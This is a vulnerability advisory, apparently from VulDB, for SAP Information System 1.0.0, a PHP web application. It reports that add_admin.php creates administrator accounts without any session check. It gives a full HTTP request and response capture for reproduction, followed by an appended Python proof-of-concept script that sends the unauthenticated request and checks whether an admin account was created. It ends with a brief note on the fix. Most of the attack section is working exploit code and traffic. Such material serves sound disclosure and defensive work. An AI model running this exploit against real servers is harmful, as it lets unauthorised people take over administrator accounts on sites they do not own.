| Title | SAP Information System 1.0.0 - Improper Authentication |
|---|
| Description | Summary:
SAP Information System version 1.0.0 suffers from an improper authentication vulnerability: the endpoint /SAP_Information_System/controllers/add_admin.php accepts a POST request that creates an administrative account without verifying that the caller holds an authenticated session. The multipart body carries the new account's username and password together with a user field set to admin. Because the script performs no session verification, an unauthenticated user can add an administrator and then log in with full privileges.
Steps to Reproduce:
1. Copy the request below, change the Host (and the Origin and Referer) to the target, and send it to the server:
############################################
POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1
Host: target.com
Content-Length: 345
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI
Origin: http://target.com
Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c
Connection: close

------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="username"

hacker
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="password"

P@ssw0rd!
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="user"

admin
------WebKitFormBoundaryYELEK8fMdX63l0iI--
############################################
Response:
############################################
HTTP/1.1 200 OK
Date: Tue, 05 Apr 2022 16:15:46 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 267
Connection: close
Content-Type: text/html; charset=UTF-8

<script type="text/javascript">setTimeout(function () { swal("Add Admin Successfully!","Message!","success");}, 1000);</script><script type="text/javascript">setTimeout(function(){window.location = "/SAP_Information_System/Dashboard/pages/Admin.php"},1000)</script>
############################################
2. Go to the login page and sign in with the credentials hacker / P@ssw0rd!. The resulting session has administrative privileges. |
|---|
| Source | https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html |
|---|
| User | mrempy (UID 24379) |
|---|
| Submission | 04/05/2022 23:26 (4 years ago) |
|---|
| Moderation | 04/06/2022 04:56 (5 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 196550 [SAP Information System 1.0 POST Request add_admin.php improper authentication] |
|---|
| Points | 20 |
|---|
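As an added example, not part of this submission or of the SAP Information System code: a Python script that rebuilds the multipart body from the request above byte for byte (it comes to exactly the 345 bytes the captured Content-Length states), sends it deliberately without any Cookie header, and checks the reply for the swal() success message and the redirect to Admin.php. Sending without a session cookie is the check that actually demonstrates the missing session verification, since the captured request carried a PHPSESSID. The host target.com is the advisory's placeholder; the port, timeout and helper names are assumptions made here.

```python
"""Added example (not from the advisory or the project): unauthenticated
add_admin.php request for SAP Information System 1.0.0, with reply checks."""
import http.client
import re
import sys

ENDPOINT = "/SAP_Information_System/controllers/add_admin.php"
# The boundary is arbitrary; this is the one from the advisory's capture.
BOUNDARY = "----WebKitFormBoundaryYELEK8fMdX63l0iI"
SUCCESS_MARKER = "Add Admin Successfully!"


def build_multipart(fields, boundary=BOUNDARY):
    """Encode fields as multipart/form-data in the layout the captured request uses.

    Each part is: boundary line, Content-Disposition header, blank line, value.
    The closing boundary ends in '--'. CRLF line endings are what the browser
    sends and what PHP's multipart parser expects.
    """
    lines = []
    for name, value in fields.items():
        lines.append(f"--{boundary}")
        lines.append(f'Content-Disposition: form-data; name="{name}"')
        lines.append("")
        lines.append(value)
    lines.append(f"--{boundary}--")
    lines.append("")
    return "\r\n".join(lines).encode()


def build_request(host, fields, boundary=BOUNDARY):
    """Return (headers, body). No Cookie header is included on purpose: if
    add_admin.php really performs no session check, the request must succeed
    without one."""
    body = build_multipart(fields, boundary)
    headers = {
        "Host": host,
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
        "X-Requested-With": "XMLHttpRequest",
        "Accept": "*/*",
        "Connection": "close",
    }
    return headers, body


def is_admin_added(response_body):
    """True when the reply carries the success message seen in the advisory."""
    return SUCCESS_MARKER in response_body


def redirect_target(response_body):
    """Path the reply's inline script redirects to, or None if absent."""
    m = re.search(r'window\.location\s*=\s*"([^"]+)"', response_body)
    return m.group(1) if m else None


def add_admin(host, username, password, port=80, timeout=10):
    """Send the request to host and return (status, created_flag, redirect)."""
    fields = {"username": username, "password": password, "user": "admin"}
    headers, body = build_request(host, fields)
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", ENDPOINT, body=body, headers=headers)
        resp = conn.getresponse()
        text = resp.read().decode("utf-8", errors="replace")
    finally:
        conn.close()
    return resp.status, is_admin_added(text), redirect_target(text)


if __name__ == "__main__":
    # Usage: python3 poc.py <host>; target.com is the advisory's placeholder.
    target = sys.argv[1] if len(sys.argv) > 1 else "target.com"
    status, created, redirect = add_admin(target, "hacker", "P@ssw0rd!")
    print(f"HTTP {status}: {'admin account created' if created else 'no success marker'}"
          f"{', redirect to ' + redirect if redirect else ''}")
```

A server-side fix has to happen inside add_admin.php itself: the script must start the session and refuse the request unless an authenticated administrator is present, before touching the database. Client-side redirects to Admin.php, as in the captured reply, do not constitute an access check.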